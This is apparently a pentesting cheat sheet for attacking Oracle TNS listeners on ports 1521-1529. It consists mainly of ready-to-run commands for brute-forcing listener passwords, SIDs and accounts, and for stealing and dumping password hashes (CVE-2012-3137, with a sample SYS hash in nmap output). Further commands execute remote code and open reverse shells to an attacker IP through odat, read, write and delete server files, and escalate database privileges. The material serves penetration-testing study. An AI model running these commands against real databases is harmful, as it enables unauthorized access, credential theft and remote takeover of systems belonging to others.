Oracle TNS

Pentesting Oracle TNS - TCP Ports 1521,1522-1529

Theory

Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.

Practice

Enumerate version

Using nmap scripts, we can enumerate the version of the TNS-Listener

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>

We can enumerate the TNS-Listener using the tnscmd10g tool

tnscmd10g version -p 1521 -h <IP>

Commands & Brute-force

When enumerating Oracle the first step is to talk to the TNS-Listener

# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>

# Dump service data
tnscmd10g services -p 1521 -h <IP>

# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>

# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>

If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected

We can use hydra to brute-force TNS-Listener password

hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listener

Targeting SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

We can brute-force SID using Hydra or Odat

#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid

#Using odat
odatPLSEXTPROC sidguesser -s $SERVER -d $SID --sids-file=./sids.txt

# Interesting Wordilists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sids

In some old versions (in 9 it works) we can enumerate the SID using tnscmd10g

#The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
tnscmd10g status-p 1521 -h <IP>

Targeting Accounts

Once we have found a valid SID, the next step is account enumeration. From this point, you can connect to the listener and brute-force credentials.

We can use Hydra or odat, or nmap to bruteforce accounts on a known SID

#Odat
odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt

#Hydra
hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID

#Nmap
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVER

Here are mixed wordlists taken from hacktricks and some interesting other wordlists

# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst

# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

# User/Password list
cat /usr/share/oscanner/accounts.default

Stealremotepwds - CVE-2012-3137

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique

Using nmap we can retreive intercept the initial traffic during authorization phase and extract a hash to bruteforce it offline:

root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.11.21.30
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
|     A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - 
|     Hashed valid or invalid credentials
|   Statistics
|_    Performed 241 guesses in 12 seconds, average tps: 20

john hashes.txt

Also, we can use odat

# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module

# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lst

Dump Oracle Hashes

Password hashes in Oracle are stored in the sys.users$ or dba_users tables. With permissions, we can extract them using odat

You may want to add the --sysdba to make it works

# Test the module before use it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module

# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords

# Dump hashes indirectly with CVE-2020-2984 for 12c or higher 
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm

# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history

# Dump hashes with DBMS_STAT
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-stats

Logging into a Remote Database

To login using known credentials, we can use sqlplus

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'

Remote Code Execution

If an account has system database priviledges (sysdba) or system operator (sysop) you may add following args when using odat:

--sysdba
--sysoper

We can try to execute code using odat Java Stored Procedure

# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

We can try to execute code using odat and Oracle Scheduler

# Execute commands
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"

# Get a reverse shell
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

We can try to execute code using odat and Oracle External Tables

odat externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

ODAT requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory (the manual version of this attack requires less privileges).

Read/Write files

We can try to read/write files using odat and utlfile

#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt

#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt

#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txt

We can try to read files using odat and Oracle External Tables

#Read file
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/RemotePath" remote_file.txt local_file.txt

OracleSQL Privilege Escalation

We may use the privesc module from odat to escalate our privileges on the DB. On that link you will find several ways to escalate privileges using odat.

#Get module Help
odat privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h

Automation Tools

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>

Another tool that will do all of this is odat

# Bruteforce SID and check all
odat all -s <IP> -p <PORT>

# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>

# Check all for that acccount
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>

# Check all for that acccount as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoper

Resources

1521,1522-1529 - Pentesting Oracle TNS ListenerHackTricks

Last updated 17 hours ago